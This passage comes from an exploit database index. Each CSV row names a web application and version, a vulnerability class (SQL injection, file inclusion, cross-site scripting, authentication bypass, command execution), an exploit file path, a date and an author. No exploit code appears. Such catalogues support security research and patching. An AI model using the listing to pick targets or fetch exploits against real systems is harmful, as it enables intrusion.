Rosello",webapps,php, +31938,exploits/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,webapps,php, +31939,exploits/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting",2008-06-19,"Jessica Hope",webapps,php, +31943,exploits/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,AmnPardaz,webapps,php, +32214,exploits/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,webapps,php,80 +31944,exploits/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection (2)",2008-06-21,Mr.SQL,webapps,php, +31945,exploits/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,webapps,php, +31946,exploits/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Multiple Remote File Inclusions",2008-06-23,CraCkEr,webapps,php, +31947,exploits/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,webapps,php, +31948,exploits/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,webapps,php, +31949,exploits/php/webapps/31949.txt,"Chipmunk Blog - 'members.php' Cross-Site Scripting",2008-06-23,sl4xUz,webapps,php, +31950,exploits/php/webapps/31950.txt,"Chipmunk Blog - 'comments.php' Cross-Site Scripting",2008-06-23,sl4xUz,webapps,php, +31951,exploits/php/webapps/31951.txt,"Chipmunk Blog - 'photos.php' Cross-Site Scripting",2008-06-23,sl4xUz,webapps,php, +31952,exploits/php/webapps/31952.txt,"Chipmunk Blog - 'archive.php' Cross-Site Scripting",2008-06-23,sl4xUz,webapps,php, +31953,exploits/php/webapps/31953.txt,"Chipmunk Blog - 'cat.php' Cross-Site Scripting",2008-06-23,sl4xUz,webapps,php, +31954,exploits/php/webapps/31954.txt,"Benja CMS 0.1 - '/admin/admin_edit_submenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",webapps,php, +31955,exploits/php/webapps/31955.txt,"Benja CMS 0.1 - '/admin/admin_new_submenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",webapps,php, +31956,exploits/php/webapps/31956.txt,"Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",webapps,php, +31960,exploits/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,webapps,php, +31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80 +31962,exploits/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,webapps,ios,8080 +31967,exploits/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - Cross-Site Scripting",2008-06-26,"Erez Metula",webapps,asp, +32135,exploits/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",webapps,php, +32046,exploits/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure",2008-07-11,"Deniz Cevik",webapps,jsp, +32047,exploits/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,webapps,php, +31970,exploits/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,webapps,php,80 +31971,exploits/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php?id' SQL Injection",2014-02-28,HauntIT,webapps,php,80 +32094,exploits/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,webapps,cgi, +31975,exploits/php/webapps/31975.txt,"The Rat CMS - 'viewarticle.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-26,"CWH Underground",webapps,php, +31976,exploits/php/webapps/31976.txt,"The Rat CMS - 'viewarticle2.php?id' Cross-Site Scripting",2008-06-26,"CWH Underground",webapps,php, +31977,exploits/php/webapps/31977.txt,"The Rat CMS - 'viewarticle.php?id' SQL Injection",2008-06-26,"CWH Underground",webapps,php, +31978,exploits/php/webapps/31978.txt,"The Rat CMS - 'viewarticle2.php?id' SQL Injection",2008-06-26,"CWH Underground",webapps,php, +31982,exploits/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,webapps,php,80 +32134,exploits/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,webapps,php, +31983,exploits/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",webapps,multiple,32400 +31986,exploits/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",webapps,php,80 +31989,exploits/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php?SortBy' SQL Injection",2014-02-28,HauntIT,webapps,php,80 +31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple, +31992,exploits/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,webapps,windows, +31993,exploits/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,webapps,windows,8080 +31994,exploits/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting",2014-03-01,Portcullis,webapps,windows,8080 +31995,exploits/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,webapps,windows,8080 +32001,exploits/php/webapps/32001.txt,"RSS-aggregator 1.0 - 'IdFlux' SQL Injection",2008-06-30,"CWH Underground",webapps,php, +32002,exploits/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' SQL Injection",2008-06-30,"CWH Underground",webapps,php, +32003,exploits/php/webapps/32003.txt,"RSS-aggregator 1.0 - Authentication Bypass",2008-06-30,"CWH Underground",webapps,php, +32004,exploits/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-30,"Jesper Jurcenoks",webapps,php, +32005,exploits/php/webapps/32005.txt,"FaName 1.0 - 'page.php?name' Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",webapps,php, +32131,exploits/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",webapps,php, +32010,exploits/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",webapps,php, +32011,exploits/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,webapps,php, +32013,exploits/php/webapps/32013.txt,"Zoph 0.7.2.1 - SQL Injection",2008-07-07,"Julian Rodriguez",webapps,php, +32014,exploits/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",webapps,php, +32015,exploits/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,webapps,php, +32016,exploits/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,webapps,php, +32017,exploits/php/webapps/32017.html,"vBulletin 3.7.1 - 'admincp/faq.php?Injection adminlog.php' Cross-Site Scripting",2008-07-08,"Jessica Hope",webapps,php, +32020,exploits/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",webapps,php, +32021,exploits/php/webapps/32021.txt,"Xomol CMS 1.2 - '/index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",webapps,php, +32022,exploits/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",webapps,php, +32023,exploits/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",webapps,php, +32024,exploits/php/webapps/32024.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32025,exploits/php/webapps/32025.txt,"V-Webmail 1.6.4 - '/includes/pear/Net/Socket.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32026,exploits/php/webapps/32026.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32027,exploits/php/webapps/32027.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/Tree.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32028,exploits/php/webapps/32028.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32029,exploits/php/webapps/32029.txt,"V-Webmail 1.6.4 - '/includes/pear/Console/Getopt.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32030,exploits/php/webapps/32030.txt,"V-Webmail 1.6.4 - '/includes/pear/System.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32031,exploits/php/webapps/32031.txt,"V-Webmail 1.6.4 - '/includes/pear/Log.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32032,exploits/php/webapps/32032.txt,"V-Webmail 1.6.4 - '/includes/pear/File.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32033,exploits/php/webapps/32033.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32034,exploits/php/webapps/32034.txt,"V-Webmail 1.6.4 - '/includes/cachedConfig.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32035,exploits/php/webapps/32035.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32036,exploits/php/webapps/32036.txt,"V-Webmail 1.6.4 - '/includes/email.list.search.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,webapps,php, +32037,exploits/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections",2014-03-03,LiquidWorm,webapps,php, +32038,exploits/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",webapps,php, +32039,exploits/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",webapps,php, +32040,exploits/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",webapps,php, +32283,exploits/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' SQL Injection",2008-08-21,"Hussin X",webapps,php, +32284,exploits/php/webapps/32284.txt,"Simasy CMS - 'id' SQL Injection",2008-08-21,r45c4l,webapps,php, +32051,exploits/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,webapps,php, +32053,exploits/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,webapps,php, +32057,exploits/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,webapps,php, +32058,exploits/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",webapps,php, +32059,exploits/php/webapps/32059.txt,"Claroline 1.8.9 - 'announcements/announcements.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32060,exploits/php/webapps/32060.txt,"Claroline 1.8.9 - 'calendar/agenda.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32061,exploits/php/webapps/32061.txt,"Claroline 1.8.9 - 'course/index.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32062,exploits/php/webapps/32062.txt,"Claroline 1.8.9 - 'course_description/index.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32063,exploits/php/webapps/32063.txt,"Claroline 1.8.9 - 'document/document.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32064,exploits/php/webapps/32064.txt,"Claroline 1.8.9 - 'exercise/exercise.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32065,exploits/php/webapps/32065.txt,"Claroline 1.8.9 - 'group/group_space.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32066,exploits/php/webapps/32066.txt,"Claroline 1.8.9 - '/phpBB/newtopic.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32067,exploits/php/webapps/32067.txt,"Claroline 1.8.9 - 'phpBB/reply.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32068,exploits/php/webapps/32068.txt,"Claroline 1.8.9 - 'phpBB/viewtopic.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32069,exploits/php/webapps/32069.txt,"Claroline 1.8.9 - 'wiki/wiki.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32070,exploits/php/webapps/32070.txt,"Claroline 1.8.9 - 'work/work.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",webapps,php, +32071,exploits/php/webapps/32071.txt,"Claroline 1.8.9 - '/claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",webapps,php, +32075,exploits/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",webapps,php,80 +32076,exploits/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",webapps,php,80 +32077,exploits/php/webapps/32077.txt,"IBS 0.15 - 'Username' Cross-Site Scripting",2008-07-17,Cyb3r-1sT,webapps,php, +32078,exploits/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,webapps,php, +32079,exploits/php/webapps/32079.txt,"CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion",2008-07-18,Ciph3r,webapps,php, +32080,exploits/php/webapps/32080.txt,"CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion",2008-07-18,Ciph3r,webapps,php, +32081,exploits/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,webapps,php, +32082,exploits/php/webapps/32082.txt,"Def_Blog 1.0.3 - 'comaddok.php?article' SQL Injection",2008-07-18,"CWH Underground",webapps,php, +32083,exploits/php/webapps/32083.txt,"Def_Blog 1.0.3 - 'comlook.php?article' SQL Injection",2008-07-18,"CWH Underground",webapps,php, +32085,exploits/php/webapps/32085.txt,"PHPFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,webapps,php, +32087,exploits/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,webapps,php, +32088,exploits/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,webapps,php, +32089,exploits/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Multiple SQL Injections / Cross-Site Scripting",2008-07-21,Dr.Crash,webapps,php, +32090,exploits/php/webapps/32090.txt,"Maran PHP Blog - 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,webapps,php, +32091,exploits/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",webapps,php, +32092,exploits/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,webapps,php, +32093,exploits/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,webapps,php, +32096,exploits/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,webapps,php, +32097,exploits/php/webapps/32097.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Traversal Local File Inclusion",2008-07-21,Ciph3r,webapps,php, +32098,exploits/php/webapps/32098.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,webapps,php, +32099,exploits/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion",2008-07-21,Ciph3r,webapps,php, +32100,exploits/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion",2008-07-21,Ciph3r,webapps,php, +32101,exploits/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Authentication Bypass",2008-07-21,Ciph3r,webapps,php, +32102,exploits/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Authentication Bypass",2008-07-21,Ciph3r,webapps,php, +32106,exploits/php/webapps/32106.txt,"Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,webapps,php, +32107,exploits/php/webapps/32107.txt,"Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,webapps,php, +32108,exploits/php/webapps/32108.txt,"Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,webapps,php, +32109,exploits/php/webapps/32109.txt,"Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,webapps,php, +32111,exploits/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,webapps,asp, +32113,exploits/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection",2008-07-23,"Lars Heidelberg",webapps,php, +32114,exploits/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,webapps,php, +32115,exploits/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",webapps,php, +32116,exploits/php/webapps/32116.txt,"EZContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",webapps,php, +32117,exploits/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,webapps,php, +32118,exploits/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",webapps,php, +32119,exploits/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - 'admin_group_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,webapps,asp, +32120,exploits/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - 'admin_category_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,webapps,asp, +32121,exploits/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"James Bercegay",webapps,php, +32122,exploits/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",webapps,php, +32123,exploits/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusions",2008-07-29,"Ghost Hacker",webapps,php, +32126,exploits/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,webapps,php, +32128,exploits/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,webapps,php, +32130,exploits/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,webapps,php, +32139,exploits/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Cross-Site Scripting",2008-08-01,ahmadbady,webapps,php, +32140,exploits/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' SQL Injection",2008-08-01,"H4ckCity Security Team",webapps,php, +32141,exploits/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",webapps,php, +32142,exploits/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",webapps,php, +32143,exploits/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,webapps,php, +32144,exploits/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32145,exploits/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32146,exploits/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32147,exploits/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32148,exploits/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32149,exploits/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,webapps,php, +32150,exploits/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",webapps,php, +32151,exploits/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,webapps,asp, +32157,exploits/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell & Lyndon Mendoza",webapps,asp,80 +32161,exploits/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",webapps,hardware,80 +32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80 +32168,exploits/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",webapps,php, +32169,exploits/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,webapps,php, +32170,exploits/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,webapps,php, +32171,exploits/php/webapps/32171.txt,"Softbiz Image Gallery - 'images.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,webapps,php, +32172,exploits/php/webapps/32172.txt,"Softbiz Image Gallery - 'suggest_image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,webapps,php, +32173,exploits/php/webapps/32173.txt,"Softbiz Image Gallery - 'image_desc.php?latest' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32174,exploits/php/webapps/32174.txt,"Softbiz Image Gallery - 'adminhome.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32175,exploits/php/webapps/32175.txt,"Softbiz Image Gallery - 'config.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32176,exploits/php/webapps/32176.txt,"Softbiz Image Gallery - 'changepassword.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32177,exploits/php/webapps/32177.txt,"Softbiz Image Gallery - 'cleanup.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32178,exploits/php/webapps/32178.txt,"Softbiz Image Gallery - 'browsecats.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,webapps,php, +32179,exploits/php/webapps/32179.txt,"POWERGAP ShopSystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",webapps,php, +32180,exploits/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusions",2008-08-06,casper41,webapps,php, +32181,exploits/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections",2008-08-06,"Khashayar Fereidani",webapps,php, +32182,exploits/php/webapps/32182.txt,"PHPKF-Portal 1.10 - 'baslik.php?tema_dizin' Traversal Local File Inclusion",2008-08-06,KnocKout,webapps,php, +32183,exploits/php/webapps/32183.txt,"PHPKF-Portal 1.10 - 'anket_yonetim.php?portal_ayarlarportal_dili' Traversal Local File Inclusion",2008-08-06,KnocKout,webapps,php, +32184,exploits/asp/webapps/32184.txt,"KAPhotoservice - 'order.asp?page' Cross-Site Scripting",2008-08-06,by_casper41,webapps,asp, +32185,exploits/asp/webapps/32185.txt,"KAPhotoservice - 'search.asp?Filename' Cross-Site Scripting",2008-08-06,by_casper41,webapps,asp, +32186,exploits/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,webapps,php, +32187,exploits/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusions",2008-08-06,by_casper41,webapps,php, +32188,exploits/php/webapps/32188.txt,"WebmasterSite (Multiple Products) - Remote Command Execution",2008-08-06,otmorozok428,webapps,php, +32190,exploits/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,webapps,php, +32191,exploits/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' SQL Injection",2008-08-06,Lovebug,webapps,php, +32196,exploits/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,webapps,php, +32198,exploits/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'friends.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32199,exploits/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'seutubo.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32200,exploits/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32201,exploits/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32202,exploits/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32203,exploits/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32204,exploits/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Authentication Bypass",2014-03-12,"Michael Grifalconi",webapps,hardware, +32282,exploits/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,webapps,php, +32207,exploits/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",webapps,php,80 +32211,exploits/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",webapps,php,80 +32212,exploits/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection",2014-03-12,Portcullis,webapps,asp,80 +32213,exploits/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,webapps,php,80 +32217,exploits/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",webapps,php, +32218,exploits/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,webapps,php, +32219,exploits/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",webapps,php, +32220,exploits/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 